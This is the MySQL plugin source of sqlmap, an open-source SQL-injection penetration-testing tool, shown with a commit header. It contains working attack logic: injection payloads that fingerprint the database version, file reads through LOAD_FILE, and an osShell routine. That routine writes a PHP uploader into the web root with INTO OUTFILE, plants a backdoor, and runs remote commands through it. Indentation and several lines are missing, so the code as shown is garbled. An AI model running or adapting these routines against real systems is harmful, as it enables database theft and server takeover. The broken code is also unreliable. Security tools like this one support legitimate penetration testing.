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synced 2025-03-20 09:54:24 +03:00
Added method to test for Time based blind SQL injection query stacking on the affected parameter a SLEEP() or similar DBMS specific function. Adapted libraries, plugins and XML with the above changes. Minor layout adjustments.
515 lines
18 KiB
515 lines
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#!/usr/bin/env python
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
from lib.core.agent import agent
from lib.core.common import fileToStr
from lib.core.common import formatFingerprint
from lib.core.common import getDirectories
from lib.core.common import getHtmlErrorFp
from lib.core.common import randomInt
from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.exception import sqlmapSyntaxException
from lib.core.session import setDbms
from lib.core.settings import MYSQL_ALIASES
from lib.core.settings import MYSQL_SYSTEM_DBS
from lib.core.shell import autoCompletion
from lib.core.unescaper import unescaper
from lib.request import inject
from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
from plugins.generic.fingerprint import Fingerprint
from plugins.generic.takeover import Takeover
class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
This class defines MySQL methods
def __init__(self):
self.excludeDbsList = MYSQL_SYSTEM_DBS
Enumeration.__init__(self, "MySQL")
def unescape(expression, quote=True):
if quote:
while True:
index = expression.find("'")
if index == -1:
firstIndex = index + 1
index = expression[firstIndex:].find("'")
if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex]
unescaped = ""
for i in range(firstIndex, lastIndex):
unescaped += "%d" % (ord(expression[i]))
if i < lastIndex - 1:
unescaped += ","
expression = expression.replace(old, "CHAR(%s)" % unescaped)
unescaped = "CHAR("
unescaped += ",".join("%d" % ord(c) for c in expression)
unescaped += ")"
expression = unescaped
return expression
def escape(expression):
while True:
index = expression.find("CHAR(")
if index == -1:
firstIndex = index
index = expression[firstIndex:].find(")")
if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex]
oldUpper = old.upper()
oldUpper = oldUpper.lstrip("CHAR(").rstrip(")")
oldUpper = oldUpper.split(",")
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
expression = expression.replace(old, escaped)
return expression
def __commentCheck(self):
logMsg = "executing MySQL comment injection fingerprint"
query = agent.prefixQuery(" /* NoValue */")
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
if result != kb.defaultResult:
warnMsg = "unable to perform MySQL comment injection"
return None
# MySQL valid versions updated at 10/2008
versions = (
(32200, 32233), # MySQL 3.22
(32300, 32354), # MySQL 3.23
(40000, 40024), # MySQL 4.0
(40100, 40122), # MySQL 4.1
(50000, 50072), # MySQL 5.0
(50100, 50129), # MySQL 5.1
(60000, 60008), # MySQL 6.0
for element in versions:
prevVer = None
for version in range(element[0], element[1] + 1):
randInt = randomInt()
version = str(version)
query = agent.prefixQuery(" /*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
if result == kb.defaultResult:
if not prevVer:
prevVer = version
if version[0] == "3":
midVer = prevVer[1:3]
midVer = prevVer[2]
trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:])
return trueVer
prevVer = version
return None
def getFingerprint(self):
actVer = formatFingerprint()
if not conf.extensiveFp:
return actVer
blank = " " * 16
value = "active fingerprint: %s" % actVer
comVer = self.__commentCheck()
if comVer:
comVer = formatFingerprint([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if self.banner:
banVer = re.search("^([\d\.]+)", self.banner)
banVer = banVer.groups()[0]
if re.search("-log$", self.banner):
banVer += ", logging enabled"
banVer = formatFingerprint([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlParsed = getHtmlErrorFp()
if htmlParsed:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlParsed)
return value
def checkDbms(self):
References for fingerprint:
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html
if conf.dbms in MYSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("MySQL %s" % kb.dbmsVersion[0])
if int(kb.dbmsVersion[0]) >= 5:
self.has_information_schema = True
if not conf.extensiveFp:
return True
logMsg = "testing MySQL"
randInt = str(randomInt(1))
query = "CONCAT('%s', '%s')" % (randInt, randInt)
if inject.getValue(query) == (randInt * 2):
logMsg = "confirming MySQL"
query = "LENGTH('%s')" % randInt
if not inject.getValue(query) == "1":
warnMsg = "the back-end DMBS is not MySQL"
return False
# Determine if it is MySQL >= 5.0.0
if inject.getValue("SELECT %s FROM information_schema.TABLES LIMIT 0, 1" % randInt) == randInt:
setDbms("MySQL 5")
self.has_information_schema = True
if not conf.extensiveFp:
kb.dbmsVersion = [">= 5.0.0"]
return True
# Check if it is MySQL >= 6.0.3
if inject.getValue("SELECT %s FROM information_schema.PARAMETERS LIMIT 0, 1" % randInt) == randInt:
if inject.getValue("SELECT %s FROM information_schema.PROFILING LIMIT 0, 1" % randInt) == randInt:
kb.dbmsVersion = [">= 6.0.5"]
kb.dbmsVersion = [">= 6.0.3", "< 6.0.5"]
# Or if it MySQL >= 5.1.2 and < 6.0.3
elif inject.getValue("MID(@@plugin_dir, 1, 1)"):
if inject.getValue("SELECT %s FROM information_schema.PROFILING LIMIT 0, 1" % randInt) == randInt:
kb.dbmsVersion = [">= 5.1.28", "< 6.0.3"]
elif inject.getValue("MID(@@innodb_stats_on_metadata, 1, 1)"):
kb.dbmsVersion = [">= 5.1.17", "< 5.1.28"]
elif inject.getValue("SELECT %s FROM information_schema.REFERENTIAL_CONSTRAINTS LIMIT 0, 1" % randInt) == randInt:
kb.dbmsVersion = [">= 5.1.10", "< 5.1.17"]
elif inject.getValue("SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1" % randInt) == randInt:
kb.dbmsVersion = [">= 5.1.7", "< 5.1.10"]
elif inject.getValue("SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1" % randInt) == randInt:
kb.dbmsVersion = ["= 5.1.6"]
elif inject.getValue("SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1" % randInt) == randInt:
kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"]
elif inject.getValue("MID(@@table_open_cache, 1, 1)"):
kb.dbmsVersion = [">= 5.1.3", "< 5.1.5"]
kb.dbmsVersion = ["= 5.1.2"]
# Or if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.getValue("MID(@@hostname, 1, 1)"):
kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"]
elif inject.getValue("SELECT 1 FROM DUAL") == "1":
kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"]
elif inject.getValue("DATABASE() LIKE SCHEMA()"):
kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"]
kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"]
# Otherwise assume it is MySQL < 5.0.0
setDbms("MySQL 4")
kb.dbmsVersion = ["< 5.0.0"]
if not conf.extensiveFp:
return True
# Check which version of MySQL < 5.0.0 it is
coercibility = inject.getValue("COERCIBILITY(USER())")
if coercibility == "3":
kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"]
elif coercibility == "2":
kb.dbmsVersion = [">= 4.1.1", "< 4.1.11"]
elif inject.getValue("CURRENT_USER()"):
kb.dbmsVersion = [">= 4.0.6", "< 4.1.1"]
if inject.getValue("CHARSET(CURRENT_USER())") == "utf8":
kb.dbmsVersion = ["= 4.1.0"]
kb.dbmsVersion = [">= 4.0.6", "< 4.1.0"]
elif inject.getValue("FOUND_ROWS()") == "0":
kb.dbmsVersion = [">= 4.0.0", "< 4.0.6"]
elif inject.getValue("CONNECTION_ID()"):
kb.dbmsVersion = [">= 3.23.14", "< 4.0.0"]
elif re.search("@[\w\.\-\_]+", inject.getValue("USER()")):
kb.dbmsVersion = [">= 3.22.11", "< 3.23.14"]
kb.dbmsVersion = ["< 3.22.11"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True
warnMsg = "the back-end DMBS is not MySQL"
return False
def readFile(self, rFile):
logMsg = "fetching file: '%s'" % rFile
return inject.getValue("LOAD_FILE('%s')" % rFile)
def osShell(self):
This method is used to write a PHP agent (cmd.php) on a writable
remote directory within the web server document root.
Such agent is written using the INTO OUTFILE MySQL DBMS
@todo: * Add a web application crawling functionality to detect
all (at least most) web server directories and merge with
Google results if the target host is a publicly available
hostname or IP address;
* Extend to all DBMS using their functionalities (UDF, stored
procedures, etc) to write files on the system or directly
execute commands on the system without passing by the agent;
* Automatically detect the web server available interpreters
parsing 'Server', 'X-Powered-By' and 'X-AspNet-Version' HTTP
response headers;
* Extend the agent to other interpreters rather than only PHP:
ASP, JSP, CGI (Python, Perl, Ruby, Bash).
logMsg = "retrieving web application directories"
directories = getDirectories()
if directories:
logMsg = "retrieved web server directories "
logMsg += "'%s'" % ", ".join(d for d in directories)
message = "in addition you can provide a list of directories "
message += "absolute path comma separated that you want sqlmap "
message += "to try to upload the agent [/var/www/test]: "
inputDirs = readInput(message, default="/var/www/test")
message = "please provide the web server document root [/var/www]: "
inputDocRoot = readInput(message, default="/var/www")
if inputDocRoot:
kb.docRoot = inputDocRoot
kb.docRoot = "/var/www"
message = "please provide a list of directories absolute path "
message += "comma separated that you want sqlmap to try to "
message += "upload the agent [/var/www/test]: "
inputDirs = readInput(message, default="/var/www/test")
if inputDirs:
inputDirs = inputDirs.replace(", ", ",")
inputDirs = inputDirs.split(",")
for inputDir in inputDirs:
logMsg = "trying to upload the uploader agent"
directories = list(directories)
uploaded = False
backdoorName = "backdoor.php"
backdoorPath = "%s/%s" % (paths.SQLMAP_SHELL_PATH, backdoorName)
uploaderName = "uploader.php"
uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
for directory in directories:
if uploaded:
# Upload the uploader agent
uploaderQuery = uploaderStr.replace("WRITABLE_DIR", directory)
query = " LIMIT 1 INTO OUTFILE '%s/%s' " % (directory, uploaderName)
query += "LINES TERMINATED BY '\\n%s\\n'--" % uploaderQuery
query = agent.prefixQuery(" %s" % query)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
if kb.docRoot:
requestDir = directory.replace(kb.docRoot, "")
requestDir = directory
baseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
uploaderUrl = "%s/%s" % (baseUrl, uploaderName)
page = Request.getPage(url=uploaderUrl, direct=True)
if "sqlmap backdoor uploader" not in page:
warnMsg = "unable to upload the uploader "
warnMsg += "agent on '%s'" % directory
logMsg = "the uploader agent has been successfully uploaded "
logMsg += "on '%s'" % directory
# Upload the backdoor through the uploader agent
multipartParams = {
"upload": "1",
"file": open(backdoorPath, "r"),
"uploadDir": directory,
uploaderUrl = "%s/%s" % (baseUrl, uploaderName)
page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
if "Backdoor uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
uploaded = True
backdoorUrl = "%s/%s" % (baseUrl, backdoorName)
logMsg = "the backdoor has been successfully uploaded on "
logMsg += "'%s', go with your browser to " % directory
logMsg += "'%s' and enjoy it!" % backdoorUrl
message = "do you want to use the uploaded backdoor as a "
message += "shell to execute commands right now? [Y/n] "
shell = readInput(message, default="Y")
if shell in ("n", "N"):
logMsg = "calling OS shell. To quit type "
logMsg += "'x' or 'q' and press ENTER"
while True:
command = None
command = raw_input("$ ")
except KeyboardInterrupt:
errMsg = "user aborted"
except EOFError:
errMsg = "exit"
if not command:
if command.lower() in ( "x", "q", "exit", "quit" ):
cmdUrl = "%s?cmd=%s" % (backdoorUrl, command)
page = Request.getPage(url=cmdUrl, direct=True)
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if output:
print output.group(1)
print "No output"